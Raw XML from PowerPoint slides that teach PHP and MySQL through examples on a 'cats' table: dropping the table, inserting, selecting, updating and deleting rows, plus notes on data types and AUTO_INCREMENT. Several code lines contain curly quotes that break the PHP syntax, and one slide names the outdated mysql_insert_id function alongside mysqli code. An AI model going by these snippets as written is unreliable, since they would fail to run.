              <a:t>    echo "&lt;tr&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nn-NO" dirty="0"/>
              <a:t>    for ($k = 0 ; $k &lt; 4 ; ++$k)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    echo "&lt;td&gt;" . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($row[$k]) . "&lt;/td&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    echo "&lt;/tr&gt;";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PK" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  echo "&lt;/table&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-PK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0C5BC-6BDE-4750-B8CE-A1DDE8912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981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2D01C-4E8C-46E8-BC58-6D2755C0F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Dropping a Table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4DC59-DCBB-4284-A5E1-5B563DD79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556325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Example 10-9. Dropping the cats table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $conn = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, $un, $pw, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  if ($conn-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>connect_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) die("Fatal Error");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $query = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>DROP TABLE cats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $result = $conn-&gt;query($query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  if (!$result) die ("Database access failed");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-PK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C7D0CA-A7B1-4491-82FF-F5BE50246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16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B8DC8-0357-4BEE-B175-7FE77480C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Data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76659-F87E-430E-92EF-81BCD803E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270164"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example 10-10. Adding data to the cats table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $conn = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, $un, $pw, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  if ($conn-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>connect_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) die("Fatal Error");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $query = "INSERT INTO cats VALUES(NULL, 'Lion', 'Leo', 4)";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $result = $conn-&gt;query($query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  if (!$result) die ("Database access failed");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The NULL value is passed as the first parameter because the id  column is of type AUTO_INCREMENT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90D37B-8DEE-4312-90A9-F24B2050A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01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9F0E1-3406-47D3-9663-BB7A01783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 Commands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EBAC1-A897-4ECA-B5D5-3CE5D3D10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337" y="1325832"/>
            <a:ext cx="11719912" cy="5419799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data Types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CHAR data type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>stores fixed/variable length strings with a character set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BINARY data type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>stores strings of bytes that do not have an associated character set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Numeric data types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>stores various type of numeric values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DATE and TIME types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>stores date and time values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Primary keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unique key(s) for identification of each row of the table.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438FF1-B740-4B41-80B4-5C87D0683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310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B0BF4-B486-4D9F-82EC-9AE469531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Retrieving Data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61DF2-B6D4-4F11-A949-268FB94B6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19799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Example 10-11. Retrieving rows from the cats table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $conn = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, $un, $pw, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  if ($conn-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>connect_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) die("Fatal Error");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $query = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SELECT * FROM cats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $result = $conn-&gt;query($query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  if (!$result) die ("Database access failed");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $rows = $result-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>num_rows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-PK" dirty="0"/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AA7160-79E5-43A4-9F82-02818CB9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3488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8F54E-D23C-4394-A7FB-2D04C6190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Retrieving Data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36B4F-1B6D-45B4-ADDE-EBA998927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34910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  echo "&lt;table  style='border: 1px solid black'&gt;&lt;tr&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;Id&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  echo "&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;Family&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;Name&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;Age&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;&lt;/tr&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  for ($j = 0 ; $j &lt; $rows ; ++$j)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PK" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $row = $result-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fetch_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(MYSQLI_NUM);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    echo "&lt;tr&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nn-NO" dirty="0"/>
              <a:t>    for ($k = 0 ; $k &lt; 4 ; ++$k)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    echo "&lt;td&gt;" . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($row[$k]) . "&lt;/td&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    echo "&lt;/tr&gt;";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PK" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  echo "&lt;/table&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-PK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0C5BC-6BDE-4750-B8CE-A1DDE8912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617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C5D65-1DE5-4F9C-8DE6-9C3B26026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Data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134EE-CE22-458B-9762-B925C78EC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10-12. Renaming Charly the cheetah to Charlie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $conn = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, $un, $pw, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  if ($conn-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>connect_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) die("Fatal Error");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $query = "UPDATE cats SET name='Charlie' WHERE name='Charly’”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $result = $conn-&gt;query($query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  if (!$result) die ("Database access failed");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?&gt;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12623F-B899-46F4-8FCB-F07DD7303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909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8BCAB-87C9-4713-90EA-D9C6C760D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Deleting Data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8E1F1-68B1-43E6-B700-5E6838BC1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10-13. Removing Growler the cougar from the cats table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $conn = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, $un, $pw, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  if ($conn-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>connect_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) die("Fatal Error");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $query = "DELETE FROM cats WHERE name='Growler’”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $result = $conn-&gt;query($query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  if (!$result) die ("Database access failed");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?&gt;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14ABBE-F82F-4464-B137-E58B06E34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4657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BA69B-96F8-4F9B-B187-8EF10C72B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AUTO_INCREMENT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75414-EBF3-4328-821F-D78ACB111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27915"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When using AUTO_INCREMENT, you cannot know what value has been given to a column before a row is inserted in the table.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>mysql_insert_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>function get the ID generated in the last query.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is required when newly inserted data is required to insert data in some other table(s).</a:t>
            </a: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E36990-C7D4-4B94-8611-3093514DF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210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BA69B-96F8-4F9B-B187-8EF10C72B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AUTO_INCREMENT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75414-EBF3-4328-821F-D78ACB111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27915"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example 10-14. Adding data to the cats table and reporting the insert ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $conn = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, $un, $pw, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  if ($conn-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>connect_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) die("Fatal Error");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $query = "INSERT INTO cats VALUES(NULL, 'Lynx', 'Stumpy', 5)";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $result = $conn-&gt;query($query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
